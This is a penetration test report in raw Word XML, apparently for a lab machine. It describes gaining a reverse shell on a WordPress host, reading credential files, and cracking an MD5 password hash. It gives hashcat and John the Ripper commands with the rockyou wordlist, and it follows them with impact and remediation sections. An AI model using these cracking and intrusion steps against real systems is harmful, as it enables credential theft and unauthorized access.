        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12647D42">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Ability to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gain access to robot directory and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> read user files such as:</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robot.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C621B">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WordPress configuration files containing database credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1C2D1">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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Execution of commands such as:</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whoami</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uname -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ls -la, cd /home, ls -la, cd /robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240E65C">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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A file naned password.raw-md5 was discovered to contain raw md5 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ABAC70">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val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confirmed the hash was raw md5 utilizing</w:t>
      </w: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 hash-identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE60FE">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Cracked the hash and utilized, hashcat, john the ripper and crackstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A582F">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Script used for hashcat: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>hashcat -m 0 hash4.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5069A">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Script used for john the ripper: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> john hash4.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630BC2E">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067B16B1">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002F42D0">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53414183">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17462853">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32021965">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4F6EA48E">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728885C4">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C498939">
      <w:pPr>
        <w:pStyle w:val="5"/>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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C7424E">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:right="0" w:rightChars="0" w:firstLine="315" w:firstLineChars="150"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Screenshot of Reverse Shell connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81E943">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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080"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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="427220CE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04706C">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b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317423DC">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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7455E6D0">
      <w:pPr>
        <w:pStyle w:val="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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A05EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The impact of this vulnerability is severe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96CBC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E4D8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Full access to sensitive files, including user data and system credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C97F33F">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Ability to extract WordPress database credentials and hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDADF52">
      <w:pPr>
        <w:pStyle w:val="5"/>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w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0568E5">
      <w:pPr>
        <w:pStyle w:val="5"/>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Attacker can modify website content, upload malicious files, or alter system configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FFEE7B">
      <w:pPr>
        <w:pStyle w:val="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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF1323">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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Attacker can disrupt services, delete files, or crash the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E5A5E">
      <w:pPr>
        <w:pStyle w:val="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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261EA328">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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The reverse shell provides a foothold that can be used to escalate privileges to root, leading to total system takeover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0290040B">
      <w:pPr>
        <w:ind w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> High-Level Remedaition Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA63FC5">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1. Harden Web Application Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5690C012">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Update all CMS platforms (WordPress) to the latest stable versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861EB6C">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Remove unused plugins and themes; update all remaining components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671FD9A">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Disable or restrict any functionality that allows file uploads, code editing, or remote execution unless absolutely required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5C28F">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2. Implement Strong Authentication Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B820261">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Enforce strong, unique passwords for all administrative accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046733A">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 Enable multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>factor authentication (MFA) wherever possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FDDFBD">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 Restrict access to administrative interfaces using IP allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>listing or VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>only access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627D53D8">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3. Secure File Permissions and Server Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687AC2E">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Ensure web server processes run with the least privileges necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C1BE3">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Restrict write permissions on web directories to prevent unauthorized file uploads or modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51550068">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Disable unnecessary services and remove default or sample files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76FDD4">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4. Improve Network-Level Protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DA3BD">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Implement firewall rules to limit inbound and outbound traffic, especially preventing unauthorized reverse connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193BA910">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Monitor for unusual outbound traffic patterns that may indicate shell callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FECCE0">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5. Enhance Logging and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A51AF">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 Enable detailed logging for web server activity, authentication attempts, and file changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D52F5">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Deploy intrusion detection or endpoint monitoring tools to detect suspicious behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64468F14">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Regularly review logs for anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B201218">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>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Conduct Regular Security Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE8C69">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="420" w:leftChars="0" w:right="0" w:righ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Perform periodic vulnerability scans and penetration tests to identify new weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C23D258">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="420" w:leftChars="0" w:right="0" w:righ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Apply patches promptly as part of a structured vulnerability management program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D3DDB4">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7. Implement Principle of Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2258B0">
      <w:pPr>
        <w:pStyle w:val="5"/>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Limit user and service account permissions to only what is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E681F">
      <w:pPr>
        <w:pStyle w:val="5"/>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Avoid running web applications as privileged users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563AF817">
      <w:pPr>
        <w:pStyle w:val="5"/>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w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Segregate environments (development, staging, production) to reduce risk exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5C172">
      <w:pPr>
        <w:ind w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0666BA8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78399BF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B727E9">
      <w:pPr>
        <w:ind w:firstLine="120" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– Example: Local Privilege Escalation to Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF825F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631A4377">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</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 xml:space="preserve">CRITICAL  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582191E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2260A016">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885DC7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581100AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>After obtaining a low-privileged shell, local enumeration revealed a misconfigured or vulnerable component (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> e.g </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SUID binary, outdated application, or writable script executed with elevated privileges). This was exploited to gain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294948F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
